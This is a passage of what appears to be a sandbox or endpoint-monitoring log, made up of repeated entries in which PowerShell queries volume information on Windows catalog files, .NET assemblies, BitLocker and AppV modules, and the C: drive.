    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
